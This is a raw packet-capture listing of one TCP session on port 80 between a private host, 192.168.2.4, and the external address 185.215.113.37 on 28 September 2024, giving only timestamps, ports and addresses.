Sep 28, 2024 21:26:17.847317934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847321987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847322941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847321987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847330093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847341061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847352028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847352982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847364902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847440958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847440958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847664118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847712040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847791910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847803116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847811937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847822905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847831011 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847834110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847846031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847848892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847856045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847867966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847875118 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847881079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847893000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847903967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847906113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847915888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.847923040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847943068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.847961903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.932876110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.932930946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.932943106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.932977915 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933007956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933057070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933074951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933089018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933114052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933146954 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933274984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933284998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933300972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933310986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933322906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933335066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933335066 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933346033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933353901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933376074 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933404922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.933492899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.933542013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.935549974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935559988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935571909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935604095 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.935651064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.935689926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935700893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935710907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935722113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935733080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.935765028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.935765028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.935801029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937128067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937175035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937181950 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937185049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937222958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937263966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937274933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937315941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937402010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937413931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937423944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937439919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937455893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937493086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937493086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937541962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937553883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937587976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937663078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937674046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937685013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937694073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937716007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937747002 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937819958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937829971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937839985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937860012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937870979 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937871933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937885046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937891006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937896967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937910080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.937915087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937937021 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.937979937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938175917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938186884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938196898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938208103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938230991 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938260078 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938325882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938335896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938345909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938358068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938385010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938385010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938421011 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938427925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938437939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938447952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938477039 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938505888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938539982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938551903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938561916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938572884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938585997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938592911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938627005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938627005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938685894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938697100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938709021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938740015 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938771009 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938808918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938821077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938831091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938842058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938851118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938862085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938863039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938874960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938880920 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938886881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938898087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938910007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.938918114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938918114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938937902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.938961029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939333916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939343929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939354897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939364910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939376116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939392090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939402103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939410925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939412117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939410925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939426899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939434052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939439058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939450979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939457893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939462900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939476013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939512968 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939512968 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939548969 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939798117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939809084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939819098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939829111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939840078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939853907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939852953 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939865112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939872026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939877987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939889908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939892054 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939901114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939910889 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939923048 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939930916 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939935923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939946890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939955950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939961910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939970016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939980984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.939981937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.939994097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940002918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940006971 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940013885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940026045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940026045 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940038919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940051079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940062046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940068007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940068007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940073013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940084934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940088034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940108061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940124035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940638065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940646887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940656900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940669060 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940680027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940692902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940692902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940704107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940721035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940721035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940725088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.940751076 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.940778971 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212182045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212233067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212243080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212285995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212327957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212402105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212412119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212420940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212433100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212444067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212455034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212486982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212487936 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212554932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212565899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212584019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212594032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212606907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212605953 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212620020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.212627888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212661982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212690115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.212999105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213011026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213020086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213030100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213042021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213053942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213059902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213064909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213078022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213085890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213090897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213100910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213112116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213124990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213128090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213128090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213151932 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213169098 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213449001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213460922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213470936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213479042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213490009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213496923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213500023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213514090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213521957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213545084 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213572025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213776112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213787079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213797092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213807106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213814020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213819027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213829994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213835001 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213841915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213859081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213871956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213871956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213898897 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213912010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213923931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213933945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213943958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213953972 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213954926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213965893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213977098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.213982105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.213989019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214000940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214005947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214013100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214023113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214025974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214040041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214066029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214706898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214718103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214728117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214740038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214750051 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214761972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214766979 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214772940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214785099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.214795113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214795113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214826107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.214842081 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.301070929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.306781054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529153109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529169083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529180050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529196978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529211998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529237032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529268026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529268026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529279947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529290915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529321909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529321909 CEST	49732	80	192.168.2.4	185.215.113.37
